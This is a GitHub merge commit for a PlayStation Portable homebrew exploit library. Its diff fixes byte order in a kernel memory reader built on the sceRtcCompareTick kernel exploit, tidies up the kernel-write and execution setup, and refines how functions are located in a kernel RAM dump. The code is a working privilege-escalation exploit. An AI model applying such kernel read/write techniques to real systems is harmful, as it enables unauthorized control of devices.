Merge pull request #3 from mcidclan/main

fix: correct byte order issue, review memory dump search process
PSP-Archive · Nov 26, 2024 · efebde1 · efebde1
2 parents 4519a21 + 58a17d2
commit efebde1
Show file tree

Hide file tree

Showing 5 changed files with 42 additions and 35 deletions.
diff --git a/.gitignore b/.gitignore
@@ -0,0 +1,2 @@
+*.a
+*.o
diff --git a/Makefile b/Makefile
@@ -17,7 +17,7 @@ PSPSDK=$(shell psp-config --pspsdk-path)
 
 CC=psp-gcc
 INCDIR = $(ARKROOT)/common/include
-CFLAGS = -std=c99 -Wall -Os -G0 -fno-pic
+CFLAGS = -std=c99 -Wall -Os -G0 -fno-pic -Wextra -Werror
 CXXFLAGS = $(CFLAGS) -fno-exceptions -fno-rtti
 ASFLAGS = $(CFLAGS)
 LIBDIR =

diff --git a/kernel_read.c b/kernel_read.c
@@ -1,5 +1,7 @@
+#include <time.h>
 #include <pspsdk.h>
 #include <psprtc.h>
+
 /*
   sceRtcCompareTick kernel exploit by davee, implementation by CelesteBlue
 */
@@ -8,43 +10,45 @@
 // input: 4-byte-aligned kernel address to a 64-bit integer
 // return *addr >= value;
 static int is_ge_u64(uint32_t addr, uint32_t *value) {
-	return (int)sceRtcCompareTick((uint64_t *)value, (uint64_t *)addr) <= 0;
+    return (int)sceRtcCompareTick((uint64_t *)value, (uint64_t *)addr) <= 0;
 }
 
 // input: 4-byte-aligned kernel address
 // return *addr
 uint64_t pspXploitKernelRead64(uint32_t addr) {
-	uint32_t value[2] = {0, 0};
-	uint32_t res[2] = {0, 0};
-	int bit_idx = 0;
-	for (; bit_idx < 32; bit_idx++) {
-		value[1] = res[1] | (1 << (31 - bit_idx));
-		if (is_ge_u64(addr, value))
-			res[1] = value[1];
-	}
-	value[1] = res[1];
-	bit_idx = 0;
-	for (; bit_idx < 32; bit_idx++) {
-		value[0] = res[0] | (1 << (31 - bit_idx));
-		if (is_ge_u64(addr, value))
-			res[0] = value[0];
-	}
-	return *(uint64_t*)res;
+    uint32_t value[2] = {0, 0};
+    uint32_t res[2] = {0, 0};
+    int bit_idx = 0;
+    for (; bit_idx < 32; bit_idx++) {
+        value[1] = res[1] | (1 << (31 - bit_idx));
+        if (is_ge_u64(addr, value)) {
+            res[1] = value[1];
+        }
+    }
+    value[1] = res[1];
+    bit_idx = 0;
+    for (; bit_idx < 32; bit_idx++) {
+        value[0] = res[0] | (1 << (31 - bit_idx));
+        if (is_ge_u64(addr, value)) {
+            res[0] = value[0];
+        }
+    }
+    return ((uint64_t)res[1] << 32) | res[0];
 }
 
 void pspXploitDumpKernel(u32* dst, u32* src, u32 size) {
 
-	#ifdef DEBUG
-	pspDebugScreenPrintf("Reading %d bytes of kernel ram @ %p\n", size, src);
-	#endif
+    #ifdef DEBUG
+    pspDebugScreenPrintf("Reading %d bytes of kernel ram @ %p\n", size, src);
+    #endif
 
-	if ((u32)src+size >= 0x88400000) size = 0x88400000 - (u32)src;
+    if ((u32)src+size >= 0x88400000) size = 0x88400000 - (u32)src;
 
     u32 count = 0;
     while (count < size){
         u64 ret = pspXploitKernelRead64((u32)src);
-        dst[0] = ((uint32_t *)&ret)[1];
-        dst[1] = ((uint32_t *)&ret)[0];
+        dst[0] = (uint32_t) ret;
+        dst[1] = (uint32_t)(ret >> 32);
         dst += 2;
         src += 2;
         count += 8;

diff --git a/kernel_write.c b/kernel_write.c
@@ -13,11 +13,11 @@
 extern int sceSdGetLastIndex(int a1, int a2, int a3);
 static int (* _sceKernelLibcTime)(u32 a0, u32 a1) = (void*)NULL;
 
-volatile static u32 packet[256];
-volatile static int is_exploited;
+static volatile u32 packet[256];
+static volatile int is_exploited;
 
-volatile static u32 patch_addr = 0U;
-volatile static u32 patch_inst = 0;
+static volatile u32 patch_addr = 0U;
+static volatile u32 patch_inst = 0;
 
 void pspXploitExecuteKernel(u32 kernelContentFunction)
 {
@@ -53,7 +53,7 @@ int pspXploitInitKernelExploit(){
     // figure out address of libctime
     u32 libctime_addr = pspXploitFindFunctionFromUsermode("UtilsForUser", 0x27CC57F0, kram_copy, KRAM_BACKUP_SIZE);
 
-    if (libctime_addr == NULL){
+    if (!libctime_addr){
         sceKernelFreePartitionMemory(memid);
         return -1;
     }

diff --git a/libpspexploit.c b/libpspexploit.c
@@ -166,13 +166,14 @@ u32 pspXploitFindFunctionFromUsermode(const char *library, u32 nid, void* buf, u
 {
     u32 addr;
     u32 start_addr = (u32)buf;
-
+    size_t library_len = strlen(library);
+
     if (buf) {
         u32 maxaddr = start_addr+size;
         for (addr=start_addr; addr < maxaddr; addr += 4) {
-            if (strcmp(library, (const char *)addr) == 0) {
-                
-                u32 libaddr = (addr-start_addr-4) + 0x88000000; // TODO: is -4 necessary?
+
+            if (memcmp((const char*)addr, library, library_len) == 0) {
+                u32 libaddr = (addr-start_addr) + 0x88000000;
 
                 while (*(u32*)(addr -= 4) != libaddr) {
                     if (addr <= start_addr){
@@ -249,7 +250,7 @@ u32 pspXploitFindFunction(const char *module, const char *library, u32 nid)
         void * entTab = mod->ent_top;
 
         // Iterate Exports
-        for (int i = 0; i < mod->ent_size;)
+        for (unsigned int i = 0; i < mod->ent_size;)
         {
             // Cast Export Table Entry
             struct SceLibraryEntryTable * entry = (struct SceLibraryEntryTable *)(entTab + i);
@@ -267,7 +268,7 @@ u32 pspXploitFindFunction(const char *module, const char *library, u32 nid)
                 if(total > 0)
                 {
                     // Iterate Exports
-                    for(int j = 0; j < total; j++)
+                    for(unsigned int j = 0; j < total; j++)
                     {
                         // Found Matching NID
                         if(vars[j] == nid) return vars[total + j];